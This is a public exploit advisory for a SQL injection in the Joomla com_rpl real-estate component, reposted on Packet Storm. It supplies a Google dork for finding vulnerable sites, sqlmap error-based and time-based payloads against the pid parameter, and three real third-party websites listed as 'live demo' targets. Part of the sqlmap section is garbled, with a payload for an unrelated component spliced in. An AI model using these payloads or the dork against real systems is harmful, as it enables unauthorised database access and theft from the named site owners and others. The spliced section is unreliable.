Joomla RPL component version 8.9.2 suffers from a remote SQL injection vulnerability.
c5790dcd9c0cd05951bcbc0c5f21c6b4fa52e5aa9c176cc98b97a5c5257c625b##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Joomla com_rpl SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_rpl
# Vendor Homepage : https://www.realtyna.com
# version : ALL
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# Date: 15/12/2016
# video Proof : https://www.youtube.com/watch?v=jlZ1gOM9KSk
[*] To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
# [+] DESCRIPTION :
######################
# [+] Realtyna CRM (Client Relationship Management) Add-on
# [+] for RPL is a Real Estate CRM specially designed and developed
# [+] based on business process and models required by Real Estate
# [+] AND an SQL injection has been Detected in this Joomla components
realtyna
######################
# [+] Poc :
######################
# [pid] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/index.php?option=com_rpl&view=propertyshow&pid=[SQLi]&Itemid=
######################
# [+] SQLmap PoC:
######################
# Parameter: pid (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
# Payload: option=com_rpl&view=propertyshow&pid=31825' AND (SELECT 4394
FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT
(ELT(4394=4394,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qozi&Itemid=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_rpl&view=propertyshow&pid=31825' AND SLEEP(5)--
XXKX&Itemid=load:
option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT
(ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
# GET parameter 'pid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
######################
# [!] Live Demo :
######################
#
http://www.myproperty.ae/index.php?option=com_rpl&view=propertyshow&pid=31825&Itemid=
#
http://primerealty.co.th/index.php?option=com_rpl&view=propertyshow&pid=3&Itemid
#
http://www.eprop.co.za/index.php?option=com_rpl&view=propertyshow&pid=31333&Itemid=
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed